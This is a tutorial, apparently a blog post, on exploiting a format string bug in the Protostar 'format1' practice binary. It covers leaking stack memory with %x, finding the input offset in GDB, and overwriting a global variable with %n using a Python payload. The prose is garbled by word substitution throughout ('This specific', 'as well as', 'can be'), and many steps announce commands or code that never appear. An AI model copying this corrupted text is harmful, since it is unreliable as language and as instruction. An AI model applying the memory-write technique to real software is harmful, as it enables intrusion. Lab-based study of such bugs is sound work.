Format strings are a handy way for programmers to whip up a string through several variables. They are designed to save the programmer time as well as allow their code to look much cleaner. Unbeknownst to some programmers, format strings can also be used by an attacker to compromise their entire program. In This specific guide, we are going to look at just how we can use a format string to exploit a running program.
What can be a Format String?
As mentioned above, a format string can be a neat method by which a programmer can structure a string that will they either plan to print or store to a variable. from the C programming language, a format string looks something like This specific:
printf( “We have %d dogs”, 2 );
as well as will output something like This specific:
We have 2 dogs
The secret ingredient from the format string can be the format specifier. The format specifier can be the %d from the command we just wrote. When the program sees a format specifier, This specific knows to expect a variable to replace that will specifier. In This specific case, the variable was the integer 2. Here’s another example:
char *person1 = “Bob”;
char *person2 = “Alice”;
int books = 15;
printf(“%s as well as %s have %d books”, person1,person2,books);
Let’s go line by line as well as walk through exactly what the program does.
On the first two lines, we define two strings, person1 as well as person2, as well as assign them the values of “Bob” as well as “Alice”, respectively. On line three, we define an integer variable named books, as well as give This specific the value 15. Finally, on the last line, we print out a formatted string. from the string, we see two unique format specifiers, %s as well as %d. As you might have guessed, each one expects a different data type. The former expects a string, while the latter expects an integer. There are several additional format specifiers as well. These include %x which expects a hexadecimal value as well as %c which expects an individual character.
at This specific point that will we know how to use format strings, This specific’s time to learn how to misuse them!
Taking Advantage of Vulnerable Functions
While format strings seem to merely be a different programming technique for concatenating variables as well as strings, This specific can be not actually the case. Our example of format strings that will we looked at above should raise one very important question: What happens when you have a format specifier in a string, although there can be no variable included to replace that will format specifier from the string? Let’s hop back into the Protostar virtual machine to find out.
If you don’t yet have Protostar installed, check out the installation guide in our first article on exploit development.
Just as before, we will SSH into our virtual machine with the username user as well as the password user. Once we’re logged in, This specific might be a not bad idea to type the following command.
This specific will take us through our current shell program to a much more interactive shell program called Bash. This specific will make our command line experience much more smooth.
Once that will can be taken care of, we’re going to jump right in as well as take a look at the format1 level. Let’s move to the same directory as the format1 executable by typing:
at This specific point, before we recklessly fling ourselves at the challenge, let’s take a look at the source code found on Exploit Exercises.
This specific source code might be a little intimidating for those unfamiliar with C programming, although I promise This specific’s not that will bad.
Going line-by-line, we first see a global integer named “target” being declared without a value. The fact that will This specific variable can be being declared globally instead of inside a function can be very important. This specific modifications where, in memory, the variable can be stored.
Instead of being stored on the stack, the target variable will be stored from the uninitialized data or BSS section of the program. This specific means we won’t be able to simply flood the stack with an ungodly amount of characters to alter the value of the target variable like we have done with stack overflow vulnerabilities in previous articles.
Continuing to look at the program, we see a function declared with the name “vuln.” I wonder if This specific can be where we will find the format string vulnerability ….
The first thing that will happens from the vuln function can be a call to the printf function. This specific call will print the contents of the variable named string. We first see reference to the string variable on line 8 when This specific can be declared as a parameter for the vuln function. This specific means that will when the vuln function can be called, a string can be passed as an argument as well as given the variable name “string” to be used from the function.
Next, we see an “if” statement. Essentially, the statement can be saying “if the variable target holds any value besides zero, print the following string.” through This specific if statement, we can gather that will our objective can be to somehow modify the target variable.
Finally, we can see down on line 17 the main function of the program. Inside the main function can be a call to the vuln function we just looked at, with the value “argv” passed as an argument. The variable “argv” refers to the first command line argument given to the program when This specific can be originally run. This specific can be where we will be placing our exploit once This specific can be finished.
For at This specific point, let’s just try to answer the question we posed above: What happens when you have a format specifier with no variable to replace This specific with?
The Odd Truth
We can see through the above source code that will whatever string we pass as a command-line argument to the program will be printed on line 10 with the call to the printf function. Knowing that will, let’s stop talking about This specific as well as see what actually happens if we pass a format specifier as that will argument:
Well, that will’s … strange. When we pass the %d format specifier, instead of printing “%d” or throwing an error like we might expect, we get some random integer. Where can be that will integer coming through? We could fire up GDB, the GNU debugger, as well as try to dig through the program to find This specific, although looking at memory in integer form can be sort of messy. Maybe there’s a way we can get This specific number in hexadecimal form.
Like we mentioned earlier, there’s another format specifier that will expects a hexadecimal value. Let’s see what happens if we replace %d with %x as our argument:
Lo as well as behold, we get a value (highlighted in red above) that will looks a lot like a hexadecimal value. Let’s see if we can find This specific value somewhere in memory with the GDB debugger.
To start GDB as well as attach This specific to the format1 program, let’s type the following.
Once GDB has began up, we need to set a breakpoint. Looking back at the source code, line 14 seems like a not bad choice. To set a breakpoint, we type:
at This specific point we’re all set to run the program. In GDB, you can run a program with command line arguments by using the run command with the command line arguments right after. In This specific case, we’ll type:
This specific will run the program with %x as the argument. Once we run the program we should hit a breakpoint, as seen from the image below.
When we hit a break point, execution of the program can be halted. through here, we can examine individual chunks of memory with the x command. Let’s start by looking at the stack. To do This specific, we’ll type:
The first x can be short for “examine.” This specific command allows us to examine memory, so the name can be fitting. The /32 specifies that will we want to examine the next 32 four-byte segments. The final x at the very end tells GDB that will we want to view This specific section of memory in hexadecimal format. The last term $esp tells the command to start looking at memory at the very beginning of the current stack frame. Let’s see what output we get through This specific command.
at This specific point we can see a ton of data through the stack, although one section should stick out to us: that will same hexadecimal value that will was printed earlier can be sitting on the stack!
We finally hold the answer to our question. When a format specifier doesn’t have a corresponding variable to replace This specific, the program will simply grab the value in memory at the location where This specific might have expected the corresponding variable to be. When we have a program that will improperly allows a user to print a string containing a format specifier, an attacker gains the ability to read data right through memory.
While reading data we shouldn’t be able to can be interesting, writing data that will we shouldn’t be able to write can be way more fun. With This specific fun comes complication, however, so hold onto your keyboards as well as get ready.
There can be one more format specifier we have yet to talk about. This specific specifier can be %n. While every additional format specifier can be focused on reading a particular type of data, %n can be focused on writing data. Specifically, %n will write the length of the format string up to that will point to the address of a variable. The important thing to note here can be that will the %n format specifier expects the address of a variable, not the variable itself.
Well, wait a minute! If the program we’re looking at will automatically grab an address to read through for the additional format specifiers, will This specific automatically grab an address to write to for the %n specifier? Absolutely This specific will.
In order for us to overwrite the target variable, we’re going to need to write its address to memory as well as then set up %n to write to that will address. In order to do that will, we first need to know where our original input can be on the stack.
In order to find where the string variable can be located, let’s restart the program in GDB. This specific time, we’re going to type the following command.
Just as before, we will hit the breakpoint, as well as we can start digging. To find the location of the string address, we’ll type the following.
In This specific command, p can be short for print. This specific command will print whatever variable we pass to This specific, along with the location of that will variable. Our output should look something like This specific:
through This specific output, we can gather that will the string variable can be located at 0xbffff987. If we examine the memory at that will location, we will, in fact, find the hexadecimal representation of the four As we typed at the beginning of our input.
Here’s the trick: This specific memory address (0xbffff987) can be higher than the memory address of the data we read using the format specifier. This specific means that will if we provided a string with enough format specifiers, we might continue to climb up the memory addresses until we end up returning to the beginning of our string. If we do the math, we can find out just how many format strings we might need to do that will:
By subtracting the address of the data on the stack through the starting address of the string variable, we can see that will the two are 547 bytes away. By rounding that will up to 548 as well as dividing by four, we can see we will need roughly 137 format specifiers to return to our original string. This specific sounds like a job for a Python script.
Let’s exit out of GDB as well as type the following command to return to our home directory.
Short as well as sweet. Once we’re home, let’s use the Nano text editor to open up a brand-new text document.
Once we’re in Nano, let’s type up a skeleton exploit:
Going through the code, the first line tells the Bash shell that will when This specific tries to execute This specific file, This specific should use the Python compiler. The next two lines import modules that will we’ll need for the exploit. The “os” module will allow us to make a system call to run the format1 program. The struct module will come in handy when This specific comes to writing memory addresses later on.
Line four creates an absolute whale of a string variable named payload. Inside that will variable, we will be storing four As along with 137 format specifiers. This specific’s very important to note the periods that will are placed within the string. Depending on how long or short the payload can be, the format string will grab data through memory in chunks that will differ slightly. We need to make sure that will all four of our As stay from the same section of memory that will will be read by an individual format specifier. When practicing on your own, you’ll just have to play around with the length of the string until you find a combination that will works.
Once we’re done writing the skeleton script, we can save This specific as well as run This specific. Running our exploit skeleton yields the following output:
Because we supplied 137 format specifiers, we got 137 four-byte chunks of memory. This specific includes the memory we were looking at in GDB earlier.
Looking at the output, we can see our four As (highlighted in red). We seem to have overestimated how many format specifiers we needed though. This specific can be most likely because the structure of a program’s memory can be slightly different when running in GDB instead of by itself. Editing our exploit so we only supply 132 format specifiers instead of 137 should put us exactly where we want to be:
Perfect. through here we can see the light at the end of the tunnel. The glory of exploitation can be almost upon us, although there can be one more step.
Step 3: Locating & Overwriting the Target Variable
We need to hop back into GDB one more time to get an important piece of information. We’re going to replace the four As at the beginning of our payload string with the address of the target variable. that will way, we can substitute the last %x modifier for a %n modifier which will read the address of target as well as overwrite This specific with the length of the string. In order to get the address of the target, we must type the following into GDB.
The & in front of the variable name tells GDB that will we want the address of the variable, not the value of the variable itself. Running that will command yields the following result:
at This specific point, all we have to do can be slap that will bad boy into our program as well as we should be not bad to go. Our final exploit should look like This specific at This specific point:
There were two modifications made: First, we added a brand-new variable called “address.” This specific will hold the address of the target variable. We use the struct.pack function in order to store the address in a format that will the format1 program will interpret correctly.
The second change comes when we are creating the payload variable. Instead of starting the string with four As, we start with the address variable at This specific point. We make sure to include the period afterward to make sure the address aligns with where the format specifiers are reading through. We also print one less %x format specifier as well as instead print a %n format specifier in its place. This specific can be done to ensure that will the %n format specifier will read the address we wrote at the beginning of the string as well as overwrite the data at that will address. In This specific case, that will address will (hopefully!) be the address of the target variable.
Once we’ve made the necessary modifications to the program, let’s see what happens when we run This specific:
The program confirms that will we hit the target variable perfectly as well as overwrote its data with our own. Sweet victory.
Thank you for reading! Format string exploitation can be a bit of a monster to understand at first, as well as while these vulnerabilities don’t often appear from the wild anymore, they are actually great at helping you better understand what can be actually going on behind the scenes of a program. Comment below with any questions or contact me via Twitter @xAllegiance.